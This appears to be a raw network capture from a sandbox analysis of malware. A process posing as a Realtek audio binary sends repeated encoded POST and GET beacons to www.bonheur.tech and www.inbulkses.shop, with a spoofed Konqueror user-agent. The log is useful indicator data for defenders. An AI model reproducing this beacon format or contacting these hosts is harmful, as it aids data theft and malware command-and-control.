                                                                                        Dec 12, 2024 21:57:12.182336092 CET378INHTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:57:12 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 62 3d 62 50 36 6b 35 34 4f 6a 2f 64 56 70 4f 47 79 78 2f 36 34 36 4f 73 4a 6a 6c 6b 31 4c 68 37 68 4d 36 57 48 70 63 31 30 64 42 49 35 39 72 62 74 79 51 2b 43 55 4b 7a 65 76 6d 33 31 6a 67 55 46 33 75 6a 75 58 79 77 46 64 64 6a 6e 56 46 72 41 66 36 76 4a 43 6e 45 77 43 58 6a 35 4a 52 38 4b 4d 4b 70 58 71 31 42 36 70 34 52 36 6d 76 74 71 33 43 34 6f 78 6e 6b 6f 3d 26 48 73 61 3d 4b 56 58 41 4b 31 64 4a 32 32 45 79 7a 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.11.204976476.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:17.476542950 CET644OUTPOST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 36 6c 33 65 47 4f 58 30 37 6f 53 4d 6a 4f 65 77 63 35 6d 61 79 53 6f 4c 32 43 67 4b 43 41 79 5a 48 6b 63 73 52 79 76 67 6a 77 59 45 54 56 73 4b 34 4d 59 56 4b 33 65 72 30 32 68 37 38 61 2f 6f 6f 34 47 43 6d 54 57 34 64 7a 6a 64 71 62 7a 44 77 47 4f 54 65 4a 32 61 61 7a 39 5a 66 38 51 6e 6e 51 74 71 53 54 66 65 6b 4b 6d 65 34 75 4c 62 7a 53 30 6c 6b 6d 2b 59 31 75 61 7a 66 58 78 4b 57 6c 66 6f 4b 33 56 44 5a 44 42 59 74 76 42 58 56 59 52 42 79 5a 4b 70 34 65 31 67 70 34 39 73 41 46 68 71 6e 52 2f 70 48 77 77 6e 6a 6a 64 45 36 61 59 47 4c 72 53 34 74 34 6b 38 72 45 73 4d 41 3d 3d
                                                                                        Data Ascii: Sb=76l3eGOX07oSMjOewc5maySoL2CgKCAyZHkcsRyvgjwYETVsK4MYVK3er02h78a/oo4GCmTW4dzjdqbzDwGOTeJ2aaz9Zf8QnnQtqSTfekKme4uLbzS0lkm+Y1uazfXxKWlfoK3VDZDBYtvBXVYRByZKp4e1gp49sAFhqnR/pHwwnjjdE6aYGLrS4t4k8rEsMA==
                                                                                        Dec 12, 2024 21:57:17.607647896 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.11.204976576.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:20.139900923 CET664OUTPOST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 36 6c 33 65 47 4f 58 30 37 6f 53 4e 43 2b 65 79 38 46 6d 66 53 53 72 4f 32 43 67 52 79 41 32 5a 48 59 63 73 54 65 2f 6a 52 6b 59 45 78 4e 73 4c 35 4d 59 57 4b 33 65 6a 55 32 34 6d 73 61 32 6f 6f 6c 35 43 6b 48 57 34 64 6e 6a 64 72 72 7a 44 6a 2b 50 53 4f 4a 77 44 4b 7a 37 45 50 38 51 6e 6e 51 74 71 57 79 4b 65 6b 53 6d 5a 4b 36 4c 61 57 2b 37 6d 6b 6d 35 66 31 75 61 6c 66 57 34 4b 57 6c 78 6f 4f 76 37 44 63 48 42 59 70 2f 42 58 45 59 65 4f 79 59 67 74 34 66 47 78 74 31 51 33 68 59 54 75 58 46 74 71 58 77 49 6d 31 75 48 5a 49 75 38 46 59 33 67 38 64 42 4d 2b 70 46 33 52 4b 52 42 43 68 33 66 47 5a 69 75 6c 2b 69 38 6b 67 71 4e 44 71 63 3d
                                                                                        Data Ascii: Sb=76l3eGOX07oSNC+ey8FmfSSrO2CgRyA2ZHYcsTe/jRkYExNsL5MYWK3ejU24msa2ool5CkHW4dnjdrrzDj+PSOJwDKz7EP8QnnQtqWyKekSmZK6LaW+7mkm5f1ualfW4KWlxoOv7DcHBYp/BXEYeOyYgt4fGxt1Q3hYTuXFtqXwIm1uHZIu8FY3g8dBM+pF3RKRBCh3fGZiul+i8kgqNDqc=
                                                                                        Dec 12, 2024 21:57:20.271025896 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.11.204976676.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:22.800879955 CET2578OUTPOST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 36 6c 33 65 47 4f 58 30 37 6f 53 4e 43 2b 65 79 38 46 6d 66 53 53 72 4f 32 43 67 52 79 41 32 5a 48 59 63 73 54 65 2f 6a 51 63 59 48 43 46 73 4c 61 6b 59 58 4b 33 65 70 30 32 6c 6d 73 62 6b 6f 6f 73 77 43 6b 61 6a 34 66 66 6a 63 4e 2f 7a 54 43 2b 50 48 65 4a 77 4c 71 7a 2b 5a 66 39 53 6e 6e 41 70 71 53 57 4b 65 6b 53 6d 5a 4b 57 4c 64 44 53 37 67 6b 6d 2b 59 31 75 57 7a 66 58 64 4b 57 39 48 6f 4f 6a 46 44 76 50 42 62 4a 76 42 62 57 41 65 44 79 59 69 68 59 66 65 78 71 39 54 33 68 46 73 75 58 78 48 71 57 34 49 6b 44 62 6c 46 49 65 62 52 36 48 2f 6d 66 56 68 38 5a 52 54 54 74 68 75 53 68 7a 75 46 63 43 72 37 76 2b 54 67 53 61 61 57 71 66 77 69 55 37 58 70 65 7a 37 77 57 39 52 41 66 50 6c 5a 4b 56 68 7a 31 73 6a 32 71 57 30 67 63 2b 70 78 4e 45 4a 6f 32 73 73 49 67 79 33 72 55 67 78 68 4f 35 45 4f 77 6d 7a 64 4a 4e 36 5a 44 46 51 53 4b 74 6d 4b 6a 4b 79 4e 49 50 42 6e 36 73 6f 6b 32 42 43 7a 54 31 4a 2b 2b 53 62 30 6d 6f 71 65 46 75 44 75 41 6d 55 71 71 7a 7a 50 41 2b 32 30 36 58 6b 74 78 61 [TRUNCATED]
                                                                                        Data Ascii: Sb=76l3eGOX07oSNC+ey8FmfSSrO2CgRyA2ZHYcsTe/jQcYHCFsLakYXK3ep02lmsbkooswCkaj4ffjcN/zTC+PHeJwLqz+Zf9SnnApqSWKekSmZKWLdDS7gkm+Y1uWzfXdKW9HoOjFDvPBbJvBbWAeDyYihYfexq9T3hFsuXxHqW4IkDblFIebR6H/mfVh8ZRTTthuShzuFcCr7v+TgSaaWqfwiU7Xpez7wW9RAfPlZKVhz1sj2qW0gc+pxNEJo2ssIgy3rUgxhO5EOwmzdJN6ZDFQSKtmKjKyNIPBn6sok2BCzT1J++Sb0moqeFuDuAmUqqzzPA+206Xktxatr2st7NsB4ZIfdH6s71kikp7YfD7EPuypJ3xGREtS3tESyaCRATfm+cpmGyY/8WkrKg3hVClg3nbrFS0NpV4fD9wXlCIGHN7eIFIqd06WSlaDXOdM+RVCZnWHoTi2D/MeAVpKSOoppikEnmMzrYz93uM2Uj3HQ6Gn9uDxuBnMNXRSZsBoCyhEGhgqWDVAeUn5F726c9cu7/ck+Yn6/kcXDihbxuSzucMCGdtVSohIN9RoEl7SG3i8lnCGqR9K0RjrNnzmLhRZYFQsyfXErpaYoPI8n5uR6WX3Pic+CebPJwTYKWtyj3DZjU4AJZipuz89iXzmcpKg7KO+gmOU20C3CIq2+Xq1/y1iyXwLSvyD2sdnY2ChWvkSy3L3TPInPmrl1y+J5DRVbjXZjRDceNAzezC35sG+gMBw1pd6cmudb96UWfEFCv/e6+WeFKM9+5VxWr9DzNhwVc3Q0OSGNBtC211//6u1k5lyE5vdR422quB+Ceaq/aNQSIIrwh1qNKWrOGQUUhTeZiI37WzbM1gtDkC0Vf1fP7B8Jh5MXpjrgfw4l4ijFp/t3OJIVS5PoWPmTqdx4CfW/7HTFGu0ZVvWw/OWbSkWEBV2osuosbjgLFGBA6om/JUDrQZEstYDK1u7OdTePzIc6no4no+TFWLBcy11qGF6LjCC4 [TRUNCATED]
                                                                                        Dec 12, 2024 21:57:22.800899982 CET3867OUTData Raw: 33 61 6a 45 46 6a 5a 44 64 32 69 35 66 31 33 63 52 61 6c 4b 48 62 37 73 43 7a 6f 64 38 79 59 5a 2b 46 49 4b 47 6e 2b 49 4c 58 47 6b 73 57 63 59 2b 56 36 6e 53 71 46 32 58 31 45 52 55 39 53 45 47 4b 32 70 49 6b 45 65 57 76 4d 33 44 39 70 4d 7a 32
                                                                                        Data Ascii: 3ajEFjZDd2i5f13cRalKHb7sCzod8yYZ+FIKGn+ILXGksWcY+V6nSqF2X1ERU9SEGK2pIkEeWvM3D9pMz2qbGuM9BDuuq95L8f7Tro8OmN1+pP0Thd4pxbIRK5d323Ep55RdvEa3ka5pFq9GoSG+pygF2lQWR2dvxIaClHXSw/KDTSTvH2VgqhNFlb90MvbLmXnwK6HiYyjPjw48VU5yHloPlNUlk4UhQkvH1G6NW5b+3BvsnvL
                                                                                        Dec 12, 2024 21:57:22.800976038 CET1289OUTData Raw: 6f 76 72 77 34 61 68 41 2b 69 49 49 5a 64 62 77 31 38 49 54 36 47 6c 4a 6e 2b 4c 47 37 4b 70 6e 4f 43 64 63 6c 31 37 69 62 47 6b 46 71 75 6e 35 4d 61 41 41 6c 45 62 47 62 67 56 76 72 4c 63 32 63 2b 6e 76 69 4f 42 36 78 62 76 79 39 75 78 47 44 6a
                                                                                        Data Ascii: ovrw4ahA+iIIZdbw18IT6GlJn+LG7KpnOCdcl17ibGkFqun5MaAAlEbGbgVvrLc2c+nviOB6xbvy9uxGDjVgEPyy05cI2QZB8jEBbdpybxheoyMn8EdPNGKtURDImrALgiwH/Z2qDtYDe2OZxjR0BllfNT93vzunDK8N7whb8dp9rSKTXGHU2OpEvNtjkV+hwMgygih1oaGn04HgI5AXVNX35Be6x9s+CdtllS/BUCc/xmOSk9T
                                                                                        Dec 12, 2024 21:57:22.801145077 CET79OUTData Raw: 57 76 32 4b 46 30 4b 47 46 6c 4a 6c 32 4d 43 53 6c 38 68 7a 63 68 4e 49 63 4d 50 31 78 76 39 69 59 67 53 69 56 2f 4c 70 2b 42 52 57 62 6d 66 47 42 6b 54 6c 4c 56 6d 6a 42 4e 49 69 50 38 37 51 7a 2f 4b 39 57 2b 6d 54 7a 4b 37 71 67 3d 3d
                                                                                        Data Ascii: Wv2KF0KGFlJl2MCSl8hzchNIcMP1xv9iYgSiV/Lp+BRWbmfGBkTlLVmjBNIiP87Qz/K9W+mTzK7qg==
                                                                                        Dec 12, 2024 21:57:22.938852072 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.11.204976776.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:25.464919090 CET382OUTGET /vhgo/?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:33.628042936 CET378INHTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:57:33 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 73 61 3d 4b 56 58 41 4b 31 64 4a 32 32 45 79 7a 44 26 53 62 3d 32 34 4e 58 64 7a 47 39 32 6f 49 69 41 42 48 47 75 2b 5a 51 59 6b 79 56 46 33 71 73 63 69 41 65 64 6e 64 62 6a 54 65 63 6d 79 35 70 50 68 6f 79 4b 62 67 63 66 64 36 4e 73 6b 71 47 6d 76 32 33 70 4c 6c 78 47 47 75 76 2f 73 7a 64 58 71 2b 6c 57 43 4c 51 59 39 31 45 4b 35 6d 6a 54 4c 70 78 6f 55 6b 4e 6d 77 65 53 5a 6b 32 31 58 4b 53 67 55 52 47 6d 70 32 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20="}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.11.2049768104.21.83.167807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:38.907548904 CET650OUTPOST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 53 44 50 53 70 57 2f 48 77 73 37 37 69 72 61 59 56 6c 68 44 6f 42 54 4c 49 6c 4b 66 41 77 33 4c 53 77 72 33 67 78 79 64 64 61 4f 37 6e 37 6f 44 38 56 7a 72 55 6a 50 59 6a 50 6f 6d 6a 71 6c 63 57 6c 43 74 72 47 73 4a 62 34 71 4e 55 70 59 72 33 42 51 66 6b 74 73 48 47 38 77 53 64 6a 37 57 61 34 53 65 4d 46 76 73 68 49 39 62 32 68 6e 6f 4c 41 69 30 72 30 65 73 59 58 53 6f 6c 39 34 63 39 65 4c 6b 5a 70 62 39 41 54 32 78 55 4d 66 47 66 5a 42 51 43 2f 2f 6d 36 6c 37 4b 2f 66 33 42 5a 59 70 66 53 33 50 47 71 4a 77 42 50 50 4b 68 62 2b 79 6b 76 30 45 34 51 44 59 6c 66 47 39 4e 55 51 3d 3d
                                                                                        Data Ascii: Sb=SDPSpW/Hws77iraYVlhDoBTLIlKfAw3LSwr3gxyddaO7n7oD8VzrUjPYjPomjqlcWlCtrGsJb4qNUpYr3BQfktsHG8wSdj7Wa4SeMFvshI9b2hnoLAi0r0esYXSol94c9eLkZpb9AT2xUMfGfZBQC//m6l7K/f3BZYpfS3PGqJwBPPKhb+ykv0E4QDYlfG9NUQ==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        54192.168.11.2049769104.21.83.167807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:41.557610035 CET670OUTPOST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 53 44 50 53 70 57 2f 48 77 73 37 37 6a 49 43 59 47 30 68 44 35 68 54 49 52 56 4b 66 4c 51 33 31 53 77 58 33 67 7a 65 4e 64 76 57 37 6d 5a 77 44 39 51 48 72 54 6a 50 59 73 66 6f 6e 70 4b 6b 53 57 6c 47 50 72 43 6b 4a 62 34 2b 4e 55 73 30 72 33 57 73 51 6c 39 73 42 4f 63 77 51 41 7a 37 57 61 34 53 65 4d 46 72 56 68 49 6c 62 32 52 33 6f 4b 68 69 33 30 45 65 76 4d 48 53 6f 30 74 34 59 39 65 4c 47 5a 6f 48 48 41 57 79 78 55 4e 76 47 66 4b 5a 52 5a 50 2b 76 2b 6c 36 67 33 75 61 5a 42 6f 68 77 63 33 2f 6f 6b 4a 52 35 4b 5a 48 37 47 4d 47 41 73 6e 59 4b 55 7a 68 4e 64 45 38 57 4a 51 50 74 54 42 59 2f 65 74 4a 72 4a 5a 53 61 34 2f 56 48 55 63 41 3d
                                                                                        Data Ascii: Sb=SDPSpW/Hws77jICYG0hD5hTIRVKfLQ31SwX3gzeNdvW7mZwD9QHrTjPYsfonpKkSWlGPrCkJb4+NUs0r3WsQl9sBOcwQAz7Wa4SeMFrVhIlb2R3oKhi30EevMHSo0t4Y9eLGZoHHAWyxUNvGfKZRZP+v+l6g3uaZBohwc3/okJR5KZH7GMGAsnYKUzhNdE8WJQPtTBY/etJrJZSa4/VHUcA=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        55192.168.11.2049770104.21.83.167807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:44.197402000 CET2578OUTPOST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 53 44 50 53 70 57 2f 48 77 73 37 37 6a 49 43 59 47 30 68 44 35 68 54 49 52 56 4b 66 4c 51 33 31 53 77 58 33 67 7a 65 4e 64 73 32 37 6d 73 73 44 2f 7a 66 72 53 6a 50 59 71 76 6f 69 70 4b 6b 66 57 6a 75 4c 72 43 6f 7a 62 37 47 4e 57 4b 67 72 6a 33 73 51 72 39 73 42 52 73 77 56 64 6a 36 63 61 34 43 67 4d 46 37 56 68 49 6c 62 32 58 62 6f 63 41 69 33 6e 55 65 73 59 58 53 6b 6c 39 34 77 39 65 54 38 5a 6f 43 6c 41 43 47 78 55 74 2f 47 65 35 39 52 45 2f 2b 74 35 6c 36 34 33 75 57 34 42 73 42 38 63 33 4c 47 6b 4b 78 35 48 49 62 6b 56 63 57 68 31 57 51 57 64 77 5a 48 63 6d 73 57 4d 54 62 6a 41 41 34 45 63 72 74 66 48 50 43 46 73 2f 31 68 43 4a 44 62 48 6f 2b 4e 43 30 33 32 66 71 68 39 7a 30 54 75 64 49 46 51 6f 4d 65 37 47 4a 46 35 47 2b 78 4a 78 34 6e 7a 70 34 73 68 58 4f 6d 79 34 6f 75 56 74 6e 4b 48 35 64 4b 56 6a 70 45 53 32 4b 46 4f 78 66 65 34 49 31 71 61 49 67 49 4d 75 51 62 30 79 6d 67 56 4e 46 63 62 67 4c 38 65 71 55 44 34 67 61 6e 56 76 4f 53 34 68 62 6f 74 67 6f 44 34 6b 36 67 42 64 58 41 [TRUNCATED]
                                                                                        Data Ascii: Sb=SDPSpW/Hws77jICYG0hD5hTIRVKfLQ31SwX3gzeNds27mssD/zfrSjPYqvoipKkfWjuLrCozb7GNWKgrj3sQr9sBRswVdj6ca4CgMF7VhIlb2XbocAi3nUesYXSkl94w9eT8ZoClACGxUt/Ge59RE/+t5l643uW4BsB8c3LGkKx5HIbkVcWh1WQWdwZHcmsWMTbjAA4EcrtfHPCFs/1hCJDbHo+NC032fqh9z0TudIFQoMe7GJF5G+xJx4nzp4shXOmy4ouVtnKH5dKVjpES2KFOxfe4I1qaIgIMuQb0ymgVNFcbgL8eqUD4ganVvOS4hbotgoD4k6gBdXAXCVmGm95m0iqoHaiKoYbXfICYtzvqY7a+DVvLj8p4EE98A8Cep+wGl4U6Ek7N8vzaSodVHLtSnoneNE18ckZXOUFtFX/argQMOBPPZGEXdRnhSN+PMnlDo7dg3yX/Vy9IO07Z7eNnUCfKJ9/4mdZS96RkzeZPRq1t5MQj9D0xJ13mdRTfbK6Ci0MhGLQi/jPUFBb5J0jiCpICAsPE2oL/p2dcoHj6Z7UMJQzgEfyM3FhiYG+rHR3AeZtfBfuHBkdfS4gW466l/5rTYVVLA3d30AoxmPV/+eAa8/UG7oZ3xin3aNrtn5zUpk12k1ZDJcdcOVXn1s9X6FPO9+D1znxtini/atAMYXZHqob4WI/96s7oinRIxc0WKJRpd6BSABmfgxOpe+Ft3jbQiWC5zmkH/X7v3wBXXW85sa8dAAgaXNDmInTAmpWzSDVc3qnx3ozA+XkelOhLFCQQzW+mDPiCStiW3eFuwtys6BmkIKaNBDxaSjEDxjZxhnhHQSZMYeaA9/jjlGNJWKe3Xk3T8/WeV1azUbkbcQyBHG/rzwwjFTAdC0k7m73ZwrRejHtQHJOndMkF4Im6KCRRrn2fDz2fp2t56+6wCknPRkoX0jn9Nm6ajnHALcNRlW5y6t9di1jtXxA6FPF9P8bJ9L/0881rGoY7CeHW7zZOX [TRUNCATED]
                                                                                        Dec 12, 2024 21:57:44.197429895 CET5241OUTData Raw: 75 49 6e 48 4a 6b 37 67 72 67 45 42 41 53 46 6d 61 70 43 57 79 77 66 56 77 4a 53 6e 30 6e 47 33 46 53 4d 77 48 51 2b 6f 43 6f 34 37 73 73 63 34 67 58 56 74 32 56 41 50 4f 79 70 71 30 37 73 66 61 62 43 79 7a 65 4f 78 46 37 2f 4d 7a 43 4d 59 70 6a
                                                                                        Data Ascii: uInHJk7grgEBASFmapCWywfVwJSn0nG3FSMwHQ+oCo47ssc4gXVt2VAPOypq07sfabCyzeOxF7/MzCMYpjenO9C9JHuaEJ9ULSFn5jhsmBzFUpFTRxjlYFSQRTRCCbmSz40VxdkQZOYLvC5SUF6v/MJ6blO2NYgVFEVWQME7Fxdp2a5sHUW6mC0H5rILuiUK9q4iHCkDk2d9yBRwu9Ao9tn6br1QeKao4eDwOOFhkk7v8TdAdvQ


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.11.2049771104.21.83.16780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:46.833236933 CET384OUTGET /5juh/?Sb=fBnyqhzI58/0qqn5K0IHu1zVTzK5FlfyZRuzvxuqSvPnsbI29xaXWUSjgesV5KpSdxDguhZQGIO0bb0sj0YKl6QMA8RyIBjzU5arC02cubFE1HnMLxW3shs=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:48.567513943 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:57:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <http://www.inbulkses.shop/wp-json/>; rel="https://api.w.org/"
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aL427pSCaGiXon%2BNbZQR5BOTl6VHcTdEe4J8qM27KYpoleezZJx4kaz6VaFPhpZmC6YXViNc%2Br1UMdk5Eexd1%2BTpPQqUaBveAisk58GnhH35QocY1lI9d0O9dVTxVd6uHWT%2BM1s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a0f41bfd7bd0-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114105&min_rtt=114105&rtt_var=57052&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=384&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
